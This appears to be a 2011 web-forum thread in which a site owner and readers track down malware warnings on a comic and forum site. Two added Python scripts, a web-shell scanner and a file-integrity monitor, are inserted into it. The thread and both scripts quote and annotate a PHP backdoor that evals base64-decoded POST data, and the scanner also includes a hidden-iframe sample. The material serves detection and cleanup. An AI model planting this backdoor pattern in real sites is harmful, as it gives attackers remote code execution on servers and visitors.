The Other Side forums - suitable for mature readers! _ Daily life _ Ongoing fight against hackers

Posted by: Mata Apr 19 2011, 10:33 AM

In the last couple of hours I've taken more steps to strengthen this site against hackers, but there will always be vulnerabilities that are harder to catch - basically, legions of hackers in poor countries can make money by finding new holes in code, therefore they always will.

If you get a virus/trojan/etc. warning from this or any of my sites please let me know immediately. Give me as many details as possible, either copy and paste text or with a screenshot of the details of the warning.

I will always try my best to keep this place secure, but there's only so much that can be done by myself and the team here. If you're not running any anti-malware, anti-virus, or a firewall then I highly recommend getting at the very least the Windows security software (which is a lot better than it used to be):

http://www.microsoft.com/en-us/security_essentials/default.aspx

And get your browser vulnerabilities patched with Spybot:

http://www.safer-networking.org/en/index.html

Thanks for your help and patience. If anything comes up then please let me know ASAP!

Posted by: CheeseMoose Apr 19 2011, 10:48 PM

AVG popped these up when Firefox tried to load the RSS feed from your blog.

Posted by: Mata Apr 20 2011, 08:14 AM

Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!

Posted by: Mata Apr 20 2011, 03:12 PM

I've had a try at fixing that. Could you see if it's worked please?

Posted by: snoo Apr 20 2011, 05:59 PM

AVG is still throwing up a "Threat was blocked" warning occasionally when I come to the forum, forgot to get a shot of it though... will try and remember next time it comes up!

Posted by: Mata Apr 20 2011, 09:17 PM

I got a script hidden in the forum code this afternoon too. It was pretty obscure so was unlikely to be triggered often. Let me know if it happens again please, but hopefully it's fixed.

Posted by: Daria Apr 21 2011, 10:48 AM

After realising that there's nowhere online I'd host a screenshot of the AVG threat, I messaged it to you on fb, Mata.
It was from the search newposts page.

Posted by: CheeseMoose Apr 21 2011, 11:05 AM

QUOTE (Mata @ Apr 20 2011, 09:14 AM) *
Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!

Yeah, I think that's got it. At least AVG's not objecting anymore.

Posted by: Mata Apr 21 2011, 11:19 AM

Daria is still seeing it, it seems.

Can anyone get a consistent reproduction of this problem?

Daria, can you get the error if you refresh your cached files? (I'm hoping that the script I found yesterday might have been the problem and it was lurking in your cache... But I think that's wishful thinking.)

Posted by: CheeseMoose Apr 21 2011, 02:31 PM

Speak of the devil, different day, different computer and I get:

Posted by: Mata Apr 21 2011, 02:57 PM

Righty ho, I've finally managed to locate one nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)
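Mata's method of text-searching the whole site for base64_decode can be turned into a small ranking scanner. The script below is an added example written for this thread; it is not code from the forum, from Mata, or from Invision Power Board. It walks a web root, scores each file by weighted indicators (eval of decoded or request-supplied data scores highest; a bare base64_decode scores low because forum and blog software legitimately call it for inline images and tokens, so that pattern alone produces false positives), flags 0x0 iframes of the kind the Sucuri scan reported, and also reads .htaccess, php.ini and .user.ini for auto_prepend_file/auto_append_file, the PHP directives that make the server include a file on every request without that file ever appearing in the site's own code. Indicator names, weights, the scanned extensions and the constructed sample site written by build_sample_site() are assumptions made for illustration.

```python
"""Rank files under a PHP web root by web-shell indicators.

Added example for the thread above; not code from the forum or from Invision
Power Board. Indicator names, weights, the scanned extensions and the sample
site written by build_sample_site() are assumptions made for illustration.
"""
import os
import re
import tempfile

# (name, regex, weight). base64_decode alone is low weight because real code
# (inline images, tokens) calls it too; eval of decoded or request-supplied
# data is the combination that is almost never legitimate.
INDICATORS = [
    ("eval_of_decoded", re.compile(
        r"@?eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("), 10),
    ("eval_of_request", re.compile(r"@?eval\s*\([^;]*\$_(?:POST|GET|REQUEST|COOKIE)\b"), 10),
    ("hex_key_param", re.compile(r"\$_(?:POST|GET|REQUEST)\s*\[\s*['\"][0-9a-f]{8,}['\"]\s*\]"), 6),
    ("hidden_iframe", re.compile(r"<iframe[^>]*(?:width|height)\s*=\s*['\"]?0\b", re.I), 8),
    ("long_base64_literal", re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"), 4),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\("), 3),
]
# php.ini / .htaccess / .user.ini directives that make PHP include a file on
# every request: code planted there never appears in the site's own files.
PREPEND_RX = re.compile(r"^\s*(?:php_value\s+)?auto_(?:prepend|append)_file\s*[= ]\s*(\S+)", re.M)
CONFIG_NAMES = {".htaccess", "php.ini", ".user.ini"}
CODE_EXT = {".php", ".phtml", ".inc", ".tpl", ".html", ".htm", ".js"}

def _line_of(text, offset):
    return text.count("\n", 0, offset) + 1

def scan_text(path, text):
    """Return (path, indicator, line, weight) for every hit in one file's contents."""
    hits = [(path, name, _line_of(text, m.start()), w)
            for name, rx, w in INDICATORS for m in rx.finditer(text)]
    if os.path.basename(path) in CONFIG_NAMES:
        hits += [(path, "auto_prepend_or_append:" + m.group(1), _line_of(text, m.start()), 10)
                 for m in PREPEND_RX.finditer(text)]
    return hits

def scan_tree(root):
    """Scan code and config files under root; return {path: {score, indicators}}, worst first."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn not in CONFIG_NAMES and os.path.splitext(fn)[1].lower() not in CODE_EXT:
                continue
            full = os.path.join(dirpath, fn)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits += scan_text(os.path.relpath(full, root).replace(os.sep, "/"), fh.read())
    ranked = {}
    for path, name, _, w in hits:
        entry = ranked.setdefault(path, {"score": 0, "indicators": set()})
        entry["score"] += w
        entry["indicators"].add(name)
    return dict(sorted(ranked.items(), key=lambda kv: -kv[1]["score"]))

# Constructed sample site: the backdoor quoted in the thread inside a language
# cache file, a template with a 0x0 iframe, a clean file that legitimately
# decodes base64, and an .htaccess that prepends a file from outside the web root.
SAMPLE = {
    "forums/cache/lang_cache/en/lang_global.php": '''<?php
$lang = array('ok' => 'OK');
if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }
''',
    "comic/templates/main.tpl": '''<html><body>{content}
<iframe src="http://example.invalid/c" width="0" height="0"></iframe>
</body></html>
''',
    "blog/wp-content/themes/example/inline-image.php": '''<?php
// decodes an embedded placeholder image: a legitimate base64_decode
$png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
''',
    ".htaccess": "php_value auto_prepend_file /tmp/.cache/pre.php\n",
}

def build_sample_site(root):
    for rel, body in SAMPLE.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)

def demo():
    """Build the sample site in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_tree(root)

if __name__ == "__main__":
    for path, info in demo().items():
        print(f"{info['score']:3d}  {path}  {sorted(info['indicators'])}")
```

Run it against a copy of the web root taken with the web server's own view of the files (so that auto_prepend_file in a directory .htaccess is seen too), and treat the ranking as a triage list rather than a verdict: the top entry here is the cache-file backdoor, the .htaccess directive comes next, and the clean theme file that merely decodes an image lands at the bottom.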

Posted by: CrazyFooIAintGettinOnNoPlane Apr 22 2011, 06:39 PM

QUOTE (Mata @ Apr 21 2011, 03:57 PM) *
Righty ho, I've finally managed to locate one nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)

Hmm... my guess would be it's to hijack your admin session.

CODE
if (isset($_GET["cookie"])) {                        // trigger: runs only when the request URL carries ?cookie=..., so ordinary visitors never reach this branch
    echo 'cookie=4';                                 // marker the operator looks for to confirm the backdoor is still in place
    if (isset($_POST["a9707a3e38"]))                 // the random-looking field name acts as the password: only a POST carrying it reaches eval
        @eval(base64_decode($_POST["a9707a3e38"]));  // run whatever PHP was posted; base64 hides it from plain-text searches and @ silences errors
    exit;                                            // stop before the real page renders, so the response holds only the marker and the payload's output
}

Posted by: Mata Apr 22 2011, 07:27 PM

We should be good in that regard - the admin sessions are very short on here.

Has anyone had any new problems since yesterday afternoon?

Posted by: Mata Apr 23 2011, 08:25 PM

Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=comic.matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.

I've run scans through my whole server for iframe commands and couldn't find this one. I couldn't find any nasty base64_decode commands either, so I don't think it's concealed in there. I've scanned all of my databases for iframe commands and I don't think it's in there either.

Help! Any suggestions to help find it appreciated.

Posted by: SPEAKERfortheLOST Apr 23 2011, 10:22 PM

If you have the funding, try creating another domain like test.matazone.co.uk and recreate the comic.matazone.co.uk site there.

That way, once it is setup to your liking, you can find if the scan is a remnant of the past infection or if there is an underlying issue to be resolved.

Posted by: Daria Apr 24 2011, 01:46 AM

I got it again today, twice: once on the Mittens Zombie Game, and once on the search new posts page. Forgot to get a screenshot of either one, I'm afraid :/


On a different note, I went back through the Mr Snaffleburger cartoons today because I was showing them to a friend. I found it interesting, Mata, that they were probably a huge influence on how I thought about corporate advertising and capitalism when I was in my early teens. So, thank you!

Posted by: Mata Apr 24 2011, 09:43 AM

I'd deleted the installation of PHPads and the associated database a couple of weeks ago after suspecting that this was the problem, but it seems that the invocation code was somehow compromised. I've no idea how, because the links pointed to a folder on my site and I know for a fact that the folder doesn't exist any more...

Still, I think that this has probably fixed the issue, so you're all back on watch again please - let me know if you see any trojan warnings again!

Daria: my work here is done. It was a very deliberate choice at the time to try and make people question corporate messages (in an entertaining way). I'm very chuffed that this was effective and honoured that it may have played a tiny part in making you as awesome as you are.

Posted by: Hobbits Apr 24 2011, 10:44 AM

QUOTE (Mata @ Apr 23 2011, 09:25 PM) *
Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=comic.matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.


Your site has been showing up as clear for me, and I haven't had any alerts from virus or spyware software this time around. I've clicked my way through most of the forum and comic pages to see if anything has flagged up but nothing so far. Could it be browser-specific?

Posted by: Mata Apr 24 2011, 07:39 PM

Possibly, but hopefully I've fixed it!

Posted by: Mata Apr 25 2011, 09:18 AM

I've had one report of Kaspersky still being grumpy on my comic. Could people with AVG or Kaspersky clear their cached internet files and refresh the page on my comic please?

I'm really hoping I've got it fixed, but I need to know if it's not. I have never had any warnings with Firefox, Windows Security Essentials, and Spybot blocking script exploits, so I can't see these problems myself. Confirmation one way or another would be appreciated!

Posted by: Pixelgoth Apr 25 2011, 07:50 PM

Got a blocked threat message but don't know how to paste it here.

Posted by: Mata Apr 26 2011, 07:59 AM

Last night (about midnight UK time) I got desperate and overwrote the entire main layout template for my comic and I hope that's solved the problem there, although I would have much rather found the problem so I could identify it more easily in the future.

Pixie: did you get a warning while on my comic or on these forums? If it's on here then that's going to be a lot harder to fix, and I'm going to have to rest in the hands of Mr Fuzzy on that one. If there's anything nasty lurking on the forums (you know, other than SPS*) then I've got no idea how to find it past what I've already tried.

You can use the 'Prt Sc' button to take a screenshot of whatever is on your screen at the time. You can then paste it into MS Paint (or Photoshop preferably) and save the file. You can then attach the file to a message on Facebook.

*(We love you really, SPS).

Posted by: Mata Apr 29 2011, 11:59 AM

I've had one report of a trojan still lurking on the forums. Has anyone else seen this? It's the same as before: detected with AVG and suggesting that the problem is 'Script Exploit type 1702'. Once again, I can't find anything untoward in the code.

Posted by: CheeseMoose Apr 30 2011, 07:56 AM

Yeah, I've started getting the same messages as above. Only sporadically though, not every time I come on matazone.co.uk, but they can be set off by the forums, the comic, the blog...

Posted by: Mata Apr 30 2011, 12:03 PM

Rargh!

Okay, please take a screen shot with the 'more details' tab revealed, and note the URL and time please. I've got no idea where to start.

I don't know enough about this to say what it could be, but is it possible that there is something on the server itself, not actually on my pages, that is randomly blipping a trojan warning out to any .php page?

Posted by: CheeseMoose Apr 30 2011, 09:11 PM

This happened a couple of minutes ago, so about 10:05pm on 30/04/11. Got the same alerts as before, complaining about www.matazone.co.uk/blog/?feed=rss2 I clicked on the show details button but it just popped up a box saying that the process that generated the alert was firefox.


Posted by: Mata May 1 2011, 09:26 PM

Cool, thanks.

Have you had anything while looking at my comic? If no then that suggests that the issue there could be fixed. Potentially it also means that the problem on my blog could be fixed by overwriting more of the files (the way I fixed the comic) but I don't know which files to overwrite.

I would really love to actually find the code causing the problem, rather than just overwrite it, because if I find it then it would make it much easier to find in the future (or even better, it could make it preventable).

The blog and the comic are updated to the latest versions often within hours of a new release, so they shouldn't be causing issues. It's concerning that they got infected. I'm thinking that maybe there is something lurking in the templates, because they wouldn't get overwritten with the automatic software updates... Then again, if it's the RSS code triggering it, then I've got no idea how it's getting through.

I'll keep looking. Thanks for the information!

Posted by: Mata May 1 2011, 09:36 PM

Well, there was a link to a javascript file hosted by Amazon on the blog pages that I never got working properly. I've disabled that, but that's all I can see that I didn't know about. It's possible that someone had hijacked the Amazon script somehow... Maybe?

Let me know if it's still happening please.

Posted by: Mata May 2 2011, 08:24 PM

I've scanned my blog and site several dozen times today and it's come up clean. Any new blips anyone?

Posted by: Mata May 3 2011, 09:44 AM

Ah ha! I've not found it yet, but I think I've got a clue. There are base set-up files for websites, like php.ini, and I think that a randomisation script could have been added into there that occasionally triggers the malicious code. The code doesn't exist on any of my sites, instead it exists on a higher server level. I'm getting my hosts to investigate this possibility now, but I really think that this is the right direction.

I'll let you know if I get any further. Thank you for your patience and support.

Posted by: CheeseMoose May 5 2011, 06:38 PM

I haven't seen an alert for a while. It appears you've got it.

Posted by: Mata May 6 2011, 09:05 AM

Thanks, but I'm actually not convinced. I don't have access to the configuration files that I suspect have been altered. I've got my hosting company investigating those, but they've been very quiet on that front. I hope they've got it completely, but it's more likely they've just disabled the main bit of it otherwise they probably would have told me that it's fixed.

A whole directory of dodgy files was installed on my server last night. I caught it as soon as it happened and we are now investigating to see if we can work out how they were placed there.

The war isn't over yet, but I definitely think that we're going in the right direction.

Posted by: Mata May 6 2011, 11:39 PM

Okay, so a deep scan of the site files found a couple more bits skulking around in the cgi-bin (I don't think they really did anything, but it was good to clear them out), otherwise my server should be spotless.

Let me know if you have anything weird pop up. Also, please let me know if you have had trojan reports over the last month and you don't any more. I need to work out if I've caught everything and crowdsourcing is currently the best method I've got. Thanks!

Posted by: Mata May 16 2011, 09:09 PM

Can anyone confirm that things have been clear over the last couple of weeks please?

Posted by: Spiderhobbes May 16 2011, 10:06 PM

I haven't come across any warnings here for some time but this was the case even when a lot of others were getting warnings coming up. But, from here, everything seems to have been okay the last couple of weeks.

Posted by: Mata May 21 2011, 10:18 AM

Awesome. I'm glad we finally got there. It was a real pain in the bottom trying to get everything. I've got a lot more security on my sites now and I've got monitoring systems in place that will let me know if anything is altered without my permission. We should be safe for the time being.

Even so, I'd like to get this forum updated to more recent software at some point. This isn't the latest version and it would be good to get up to date, so you may see some changes at some point in the future.
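Mata's closing post mentions monitoring that alerts on changes made without permission. The script below is an added example of one way to build that, written for this thread; it is not what matazone.co.uk actually runs and not Invision Power Board code. It hashes every file under the web root into a baseline manifest, signs the manifest with an HMAC so that an intruder who can write to the server cannot quietly re-baseline their own files, and on each later run reports added, removed and modified files. It then replays the thread's own story against a constructed tree: a backdoor appended to a language cache file, a directory of files dropped into cgi-bin, and a page removed. The sample layout, the manifest format and the HMAC key are assumptions made for illustration.

```python
"""Baseline-and-diff integrity check for a web root.

Added example, not the monitoring the forum owner describes and not Invision
Power Board code. The sample tree, the manifest format and the HMAC key are
assumptions made for illustration.
"""
import hashlib
import hmac
import json
import os
import tempfile

def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            snap[os.path.relpath(full, root).replace(os.sep, "/")] = _sha256(full)
    return snap

def diff(baseline, current):
    """Files that appeared, disappeared or changed since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p]),
    }

def _canonical(snap):
    return json.dumps(snap, sort_keys=True, separators=(",", ":")).encode()

def save_manifest(snap, path, key):
    """Write the baseline with an HMAC so an intruder who can edit files cannot quietly re-baseline."""
    tag = hmac.new(key, _canonical(snap), hashlib.sha256).hexdigest()
    with open(path, "w") as fh:
        json.dump({"files": snap, "hmac": tag}, fh)

def load_manifest(path, key):
    """Read the baseline back, refusing it if the HMAC no longer matches."""
    with open(path) as fh:
        doc = json.load(fh)
    expected = hmac.new(key, _canonical(doc["files"]), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, doc["hmac"]):
        raise ValueError("manifest HMAC mismatch: manifest altered or wrong key")
    return doc["files"]

def _write(root, rel, body):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(body)

def demo():
    """Baseline a constructed site, tamper with it the way the thread describes, and report."""
    key = b"example-key-keep-outside-htdocs"  # assumption: a real key lives in a file the web user cannot read or write
    with tempfile.TemporaryDirectory() as work:
        root = os.path.join(work, "htdocs")
        manifest = os.path.join(work, "manifest.json")  # deliberately outside the web root
        _write(root, "forums/index.php", "<?php // forum front controller\n")
        _write(root, "forums/cache/lang_cache/en/lang_global.php", "<?php $lang = array();\n")
        _write(root, "comic/index.php", "<?php // comic front page\n")
        save_manifest(snapshot(root), manifest, key)

        # Simulated compromise (constructed): a backdoor appended to a cache
        # file, a new directory of files dropped into cgi-bin, and a page deleted.
        _write(root, "forums/cache/lang_cache/en/lang_global.php",
               '<?php $lang = array();\nif (isset($_GET["cookie"])) { @eval(base64_decode($_POST["x"])); exit; }\n')
        _write(root, "cgi-bin/.tmp/dropped.php", "<?php // constructed dropped file\n")
        os.remove(os.path.join(root, "comic", "index.php"))
        report = diff(load_manifest(manifest, key), snapshot(root))

        # An intruder who also edits the manifest to cover the new file is caught by the HMAC.
        with open(manifest) as fh:
            doc = json.load(fh)
        doc["files"]["cgi-bin/.tmp/dropped.php"] = "0" * 64
        with open(manifest, "w") as fh:
            json.dump(doc, fh)
        try:
            load_manifest(manifest, key)
            forged_manifest_accepted = True
        except ValueError:
            forged_manifest_accepted = False
    return report, forged_manifest_accepted

if __name__ == "__main__":
    report, forged = demo()
    for kind, paths in report.items():
        print(f"{kind:9s} {paths}")
    print("forged manifest accepted:", forged)
```

Run snapshot plus diff from cron and re-baseline only after a deploy you made yourself. Do not exclude cache directories to cut noise: the backdoor in this thread lived in /forums/cache/lang_cache/, so changes there should be expected only at times you caused them. Keep the manifest and the key outside the document root and unwritable by the web server's user, otherwise whoever dropped the files can also rewrite the record of them.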

Powered by Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)